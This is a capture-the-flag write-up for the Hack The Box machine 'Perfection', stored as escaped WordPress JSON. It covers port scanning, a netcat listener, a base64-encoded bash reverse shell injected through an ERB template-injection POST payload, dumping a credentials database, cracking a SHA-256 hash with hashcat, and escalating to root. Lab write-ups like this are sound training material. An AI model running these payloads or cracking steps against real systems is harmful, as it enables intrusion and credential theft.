The <\/em> The http Port has a http server running. The site has input fields we could use to inject code.<\/em><\/p>\n\n\n\n The next step involves listening for incoming connections using <\/em> The use of <\/em> Use Burpsuite to capture the POST Request. Then paste in the Payload.<\/em><\/p>\n\n\n\n Payload:<\/p>\n\n\n\n Boom! There is our Reverse Shell Connection. We can now optain the User Flag and the hash from Susan.<\/em><\/p>\n\n\n\n Enumeration The initial enumeration step begins with an Nmap scan of the target IP address. Nmap is a powerful network scanning tool that helps identify open ports and the services running on those ports. In this case, the scan reveals two open ports: 22 (SSH) and 80 (HTTP). The presence of an SSH server indicates […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,4,7,8,5],"class_list":["post-10","post","type-post","status-publish","format-standard","hentry","category-htb-writeup","tag-ethical-hacking","tag-hacking","tag-htb","tag-pentesting","tag-solution","tag-writeup"],"yoast_head":"\nsudo nmap -sC -sV 10.129.216.68<\/code> command is broken down as follows:<\/em><\/p>\n\n\n\n\n
sudo<\/code> is used to run the command with root privileges, which may be necessary for certain types of scans.<\/em><\/li>\n\n\n\n-sC<\/code> runs default scripts to gather more detailed information about the services.<\/em><\/li>\n\n\n\n-sV<\/code> attempts to determine the version of the services running.<\/em><\/li>\n\n\n\n10.129.216.68<\/code> is the target IP address.<\/em><\/li>\n<\/ul>\n\n\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ sudo nmap -sC -sV 10.129.216.68\n[sudo] password for kali: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-07 21:47 CET\nNmap scan report for 10.129.216.68\nHost is up (0.11s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)\n|_ 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)\n80\/tcp open http nginx\n|_http-title: Weighted Grade Calculator\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 14.37 seconds<\/code><\/pre>\n\n\n\nWebsite<\/h2>\n\n\n\n
![\"\"](\"https:\/\/blog.pontis-security.com\/wp-content\/uploads\/2025\/04\/1_WtTamgBmnsTQgKHMJj2ApQ-1024x489.webp\")
<\/figure>\n\n\n\nStart Listener<\/h2>\n\n\n\n
nc -lvnp 7373<\/code>, where <\/em>nc<\/code> is the Netcat utility, a versatile networking tool. The flags used here (<\/em>-l<\/code> listen mode, <\/em>-v<\/code> verbose, <\/em>-n<\/code> numeric-only IP addresses, <\/em>-p<\/code> specifies the port) set up a listener on port 7373, anticipating a reverse shell from the target.<\/em><\/p>\n\n\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ nc -lvnp 7373 \nlistening on [any] 7373 ...\nconnect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582<\/code><\/pre>\n\n\n\nGenerate Payload<\/h2>\n\n\n\n
hURL<\/code> to encode and decode payloads showcases the manipulation of data to exploit web application vulnerabilities. The payload crafted for the Weighted Grade Calculator application is designed to execute a reverse shell command, taking advantage of any potential server-side code execution vulnerabilities.<\/em><\/p>\n\n\n\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ hURL -B \"bash -i >& \/dev\/tcp\/10.10.14.213\/7373 0>&1\"\n\nOriginal :: bash -i >& \/dev\/tcp\/10.10.14.213\/7373 0>&1 \nbase64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx\n \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ hURL -U \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx\"\n\nOriginal :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx \nURL ENcoded :: YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx<\/code><\/pre>\n\n\n\nInject Payload<\/h2>\n\n\n\n
![\"\"](\"https:\/\/blog.pontis-security.com\/wp-content\/uploads\/2025\/04\/1_bU_YiPmMY78G0MGnfcDiOQ-1024x370.webp\")
<\/figure>\n\n\n\ngrade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem(\"echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx|+base64+-d+|+bash\");%25>1<\/code><\/pre>\n\n\n\nUser Flag and Hash<\/h2>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ nc -lvnp 7373 \nlistening on [any] 7373 ...\nconnect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582\nbash: cannot set terminal process group (992): Inappropriate ioctl for device\nbash: no job control in this shell\nsusan@perfection:~\/ruby_app$ ls\nls\nmain.rb\npublic\nviews\nsusan@perfection:~\/ruby_app$ cd \/home\ncd \/home\nsusan@perfection:\/home$ ls\nls\nsusan\nsusan@perfection:\/home$ cd susan\ncd susan\nsusan@perfection:~$ ls\nls\nMigration\nruby_app\nuser.txt\nsusan@perfection:~$ cat user.txt\ncat user.txt\n2034XXXXXXXXXXXXXXXXXXXXXXX96ab\nsusan@perfection:~$ cd Migration\ncd Migration\nsusan@perfection:~\/Migration$ ls\nls\npupilpath_credentials.db\nsusan@perfection:~\/Migration$ strings pupilpath_credentials.db\nstrings pupilpath_credentials.db\nSQLite format 3\ntableusersusers\nCREATE TABLE users (\nid INTEGER PRIMARY KEY,\nname TEXT,\npassword TEXT\nStephen Locke154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8S\nDavid Lawrenceff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87aP\nHarry Tylerd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393O\nTina Smithdd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57Q\nSusan Miller<HASH><\/code><\/pre>\n\n\n\nCrack the Hash<\/h2>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ echo \"<HASH>\" > hash.txt \n \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d \n\n<HASH>:susan_nasus_4XXXXXXX0\n \nSession..........: hashcat\nStatus...........: Cracked\nHash.Mode........: 1400 (SHA2-256)\nHash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f\nTime.Started.....: Thu Mar 7 22:22:07 2024 (2 mins, 16 secs)\nTime.Estimated...: Thu Mar 7 22:24:23 2024 (0 secs)\nKernel.Feature...: Pure Kernel\nGuess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]\nGuess.Queue......: 1\/1 (100.00%)\nSpeed.#1.........: 2614.7 kH\/s (0.39ms) @ Accel:512 Loops:1 Thr:1 Vec:16\nRecovered........: 1\/1 (100.00%) Digests (total), 1\/1 (100.00%) Digests (new)\nProgress.........: 324558848\/1000000000 (32.46%)\nRejected.........: 0\/324558848 (0.00%)\nRestore.Point....: 324554752\/1000000000 (32.46%)\nRestore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1\nCandidate.Engine.: Device Generator\nCandidates.#1....: susan_nasus_058540610 -> susan_nasus_803824210\nHardware.Mon.#1..: Util: 32%<\/code><\/pre>\n\n\n\nLogin with Root<\/h2>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ ssh susan@10.129.216.68\nsusan@perfection:~$ sudo su\nroot@perfection:\/home\/susan# cat \/root\/root.txt\n<FLAG><\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/blog.pontis-security.com\/wp-content\/uploads\/2025\/04\/1__nlKfQW16KC1ieR3EL8vwA-1024x484.webp\")
<\/figure>\n","protected":false},"excerpt":{"rendered":"